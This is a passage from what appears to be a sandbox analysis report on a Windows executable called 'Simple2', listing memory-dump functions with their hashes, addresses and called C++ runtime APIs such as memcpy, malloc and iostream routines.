              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: bf52cdc1c20b1d92f537715df61cc92b0a08cd28cb056f847da36b7d58a63efb
              • Instruction ID: 8a70a728f30f322c256f2cc5001f65ea180190a24197b282ecbaf359f4dd6a67
              • Opcode Fuzzy Hash: bf52cdc1c20b1d92f537715df61cc92b0a08cd28cb056f847da36b7d58a63efb
              • Instruction Fuzzy Hash: 5B41D663B0964281EA209B25A8086AD6B75FB08FD0F44463AEF5D8BF85DF3CD861C304
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
              • String ID:
              • API String ID: 3292048638-0
              • Opcode ID: edea9241fc3f7b9b89f712dcf61b236231a61c741859b6b77d92b474176cc48b
              • Instruction ID: decfd7eeb7361c5f0f1dfc1cf79e5324f9c014977009eaf5460bf9a8167e56c1
              • Opcode Fuzzy Hash: edea9241fc3f7b9b89f712dcf61b236231a61c741859b6b77d92b474176cc48b
              • Instruction Fuzzy Hash: 9E41B42790DB4281EB00AB11F98466D77B5BB98FC5F05413ADE4E83B20EF3CA865C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-0
              • Opcode ID: e83c54a9e08cc45258b0d5e94d8a001542f0135930b059ec0131a8892a7033a6
              • Instruction ID: 275b6c83f4ec41616dcb3bb59a3f9d47f8a9306ea1a468fd761cea09a3a610f2
              • Opcode Fuzzy Hash: e83c54a9e08cc45258b0d5e94d8a001542f0135930b059ec0131a8892a7033a6
              • Instruction Fuzzy Hash: 22511373B08B4585EB168F29D45466C2BB5FB88FD8F504636CE5D83BA8DE78D8A18340
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5273a414ad2a8e3638f51944160ccb7bf4edba53f1bf469c37612bc3a0f81b19
              • Instruction ID: 043ad2bb8bcd229a9a997872804d64fcfa0e2442cb84d26dd418a90e7dbee76d
              • Opcode Fuzzy Hash: 5273a414ad2a8e3638f51944160ccb7bf4edba53f1bf469c37612bc3a0f81b19
              • Instruction Fuzzy Hash: 9E315227B0464686EA658F25E5047B9AB60FB44FD4F18803ACF5D87B65DE3CE8A6C300
              APIs
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CAB1B8
                • Part of subcall function 00007FF6D5CAB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6D5CAB92D
                • Part of subcall function 00007FF6D5CAB924: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF6D5CAB1BD,?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB93E
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CAB1BE
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
              • String ID:
              • API String ID: 594857686-0
              • Opcode ID: b5572d8f91ff3c0af187336c7321391bdae280d0e8a128b9ee9ed201f7d0ffee
              • Instruction ID: 84ed7f82775333a895479f8f7bf5c84fe5c88a86f576278f6af8679ced9c1655
              • Opcode Fuzzy Hash: b5572d8f91ff3c0af187336c7321391bdae280d0e8a128b9ee9ed201f7d0ffee
              • Instruction Fuzzy Hash: C6E0B603E1920B55F958616218468BD08B10F75BF8E181B3AEF7D84AD3ED1CACB54250
              APIs
              • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF6D5CA98E5
              • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF6D5CA98F1
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CA98FA
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
              • String ID:
              • API String ID: 2094784882-0
              • Opcode ID: 23e708a2569c3426e87b7543450fb33ca15486ce26cdfbe756c9933b9681a608
              • Instruction ID: 43be947c618807cfeaed93b4be80cf0f10ddc96b78d203f273efa65af69033c9
              • Opcode Fuzzy Hash: 23e708a2569c3426e87b7543450fb33ca15486ce26cdfbe756c9933b9681a608
              • Instruction Fuzzy Hash: 75D05E16B84A0682EE089F66BC9457C1730EF8DFA6B0CA032CE0F87320DE3CD4A58300
              APIs
              • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6D5CA96C5
              • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6D5CA96D1
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CA96DA
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
              • String ID:
              • API String ID: 2670548386-0
              • Opcode ID: f7284e140304bf78685db437509e0c3193b840c890769990208ee4664a5f1153
              • Instruction ID: ab3ff41301ed4627dd0bc58f4b167f6532a110a9524b1ed8f9fd7776b12fddc9
              • Opcode Fuzzy Hash: f7284e140304bf78685db437509e0c3193b840c890769990208ee4664a5f1153
              • Instruction Fuzzy Hash: 79D01712A84A0A82DA089F26B89447C1730AF89F92B08A032CE0F86320DE3CD4A98300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: _fseeki64fgetpos
              • String ID:
              • API String ID: 3401907645-0
              • Opcode ID: ecb6472a7ce75e62892e83f98b80271a100afabbccfad88630939b55a3a0e4aa
              • Instruction ID: b3dc139c6e6463ed8adbcb89deb933a7524bbd3b674d5235e800925dbee17e41
              • Opcode Fuzzy Hash: ecb6472a7ce75e62892e83f98b80271a100afabbccfad88630939b55a3a0e4aa
              • Instruction Fuzzy Hash: 57310963A14A4581EB618F29E55476D67B4FB54FE8F048136CE6CC7BA4DF38D8A68300
              APIs
              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6D5CA19FD), ref: 00007FF6D5CA7146
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6D5CA19FD), ref: 00007FF6D5CA7157
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
              • String ID:
              • API String ID: 356833432-0
              • Opcode ID: 396b18110c7e3b0189c6318ad677061b51005803ba6b4c43fc7aa01835824bc1
              • Instruction ID: f04493ca0fc95b95889a8c1d66f5798cdcb251ccc037cf8c8994da722bb44521
              • Opcode Fuzzy Hash: 396b18110c7e3b0189c6318ad677061b51005803ba6b4c43fc7aa01835824bc1
              • Instruction Fuzzy Hash: F021C076609B4184DB458F39E8547AC3BA4F748F88F45803ACE4E87768EF39C8A9C750
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: c4fad891f8838a3ff896bec8dfd8e97697a670428b7c90bc6bf96c2d856b4e86
              • Instruction ID: 49d6741851c100f981a45e7e3dd8c32e44f73ce0baf16cf54ea1ca9d770cc1d2
              • Opcode Fuzzy Hash: c4fad891f8838a3ff896bec8dfd8e97697a670428b7c90bc6bf96c2d856b4e86
              • Instruction Fuzzy Hash: 7E019E76B08B9481DA009F1AE60006EA7B5F784FC8B148537EF5C17F59DF39D9A28740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
              • String ID:
              • API String ID: 313767242-0
              • Opcode ID: 40a82ec271f847dec9676bbcc0cd14d7ff99cb64b702a5e9aa7045d9a1604bc8
              • Instruction ID: f42b88ad2717ac3b57069220ea6dcc9f567d5db40def5f6ab091df52e704b40a
              • Opcode Fuzzy Hash: 40a82ec271f847dec9676bbcc0cd14d7ff99cb64b702a5e9aa7045d9a1604bc8
              • Instruction Fuzzy Hash: 34311073609A8185EB609F60E840BED7774FB94B48F44403ADA4E87B99EF78D958C710
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
              • String ID:
              • API String ID: 2933794660-0
              • Opcode ID: b368277a78d8b3f94a862b1491a1e397c34f224aaa5acd5c28a1d5999610dac7
              • Instruction ID: 5cb372a6074cdf6ae1837303c9a1ed526a3113a3c4884fbbd95ffc595a5d16cd
              • Opcode Fuzzy Hash: b368277a78d8b3f94a862b1491a1e397c34f224aaa5acd5c28a1d5999610dac7
              • Instruction Fuzzy Hash: 15111F22B14B0189EB009F60E8552AC33B4F719B98F440D3ADE6D87B64DF7CD5648340
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01b6ad167b3f27702ef763fa15e21f823dd2f1c85ce527116d74a973a60dd82a
              • Instruction ID: 99f0f6bad470428e842ab37ab0d1677c835cd20681253b97b6f276a7d07d8d8d
              • Opcode Fuzzy Hash: 01b6ad167b3f27702ef763fa15e21f823dd2f1c85ce527116d74a973a60dd82a
              • Instruction Fuzzy Hash: 5DA00122908806E0E6448B04A8509282A30BB61B88B80403AD80E819A0EE2CA821D201
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
              • String ID:
              • API String ID: 2436281117-0
              • Opcode ID: 935088583cc97e23358117934621d19feab7de79de71029fe189be2820162756
              • Instruction ID: 41f9102cd9869fff8cd5dc683aa2de809ed3fbd64b84c90e1087ccfef99c8981
              • Opcode Fuzzy Hash: 935088583cc97e23358117934621d19feab7de79de71029fe189be2820162756
              • Instruction Fuzzy Hash: C8D1C163F19B4186FB10DB64E4447AC2A71EB44FD8F40423ADE6D93F99DE3898A5C300
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CAAF35
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CAAF55
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CAAF65
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CAAFAC
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6D5CAAFD9
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CAAFFA
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6D5CAB040
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6D5CAB047
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6D5CAB054
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: 4a409d9eeddde9c16bf3bdc8983f7975c11a2b7358316a83c88b2511ec656938
              • Instruction ID: c3b2435e61fae2ee28170343846e3eedd3242be9bd1ce7377a8b392ce0871338
              • Opcode Fuzzy Hash: 4a409d9eeddde9c16bf3bdc8983f7975c11a2b7358316a83c88b2511ec656938
              • Instruction Fuzzy Hash: 00510E67608A4181EB648F19D990A3CABB0EB94FD5F15853BDE5E83BA0DE3DD856C300
              APIs
              • ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z.MSVCP140 ref: 00007FF6D5CA8DF6
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA8FA3
                • Part of subcall function 00007FF6D5CA9D40: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CA9E58
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA8EAE
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA90BE
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA910E
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA9115
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA911B
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmemcpy$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@
              • String ID:
              • API String ID: 3138728058-0
              • Opcode ID: e6214b93f974ff175a803f96164c46fee4193a620a105653e3ca1608f30040e8
              • Instruction ID: a08cb5aa02273db28187f433aae0f2edbdaab58cc6804a13d3276498739c3295
              • Opcode Fuzzy Hash: e6214b93f974ff175a803f96164c46fee4193a620a105653e3ca1608f30040e8
              • Instruction Fuzzy Hash: 86B1B163F18A4695EB10DB68E4446AD3772EB48BD8F40423ADE5D93F99EF38D960C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: fgetc
              • String ID:
              • API String ID: 2807381905-0
              • Opcode ID: d989e32cd8d4d9aea3cbf8c9ed8202a4c5c64ba8edd9c6f971a751b8cf2c4d9c
              • Instruction ID: 6ce2a7e599895377b996d64c77be64e70f18fa439333315cab80340c4e1ea7d0
              • Opcode Fuzzy Hash: d989e32cd8d4d9aea3cbf8c9ed8202a4c5c64ba8edd9c6f971a751b8cf2c4d9c
              • Instruction Fuzzy Hash: 29914933F14A5199EB008F65D4906AC3BB0FB48BA8F54563ADE6D93B94DF38D8A4C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: 2a09d41be2bb6cf21189dc107458b1e4993c141929f0eb1c697bf44d60cc6df8
              • Instruction ID: ae11dcccbebf3b3e5a089730a4af7e2f571c3d0d9118de67c3a0e727df5c70d5
              • Opcode Fuzzy Hash: 2a09d41be2bb6cf21189dc107458b1e4993c141929f0eb1c697bf44d60cc6df8
              • Instruction Fuzzy Hash: 5B51B223A04B4591EA10AF25D9046AC27B0FB55FD8F544A3ADE6D93BC5DF38E9A4C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: b595f4fd043cd733e3912ba7a5329e90f48e81d9ba2d2f19fc89601e4949a791
              • Instruction ID: 6e2f0b3e506a5dc9936acf1bd7efabd3006bf7f4edcc43687c1481296878cb4c
              • Opcode Fuzzy Hash: b595f4fd043cd733e3912ba7a5329e90f48e81d9ba2d2f19fc89601e4949a791
              • Instruction Fuzzy Hash: DA51B033A08B8592FA109F21D5046AD2B71FB14FC8F14463ADE2C97B91CF79E9A5D340
              APIs
              Memory Dump Source
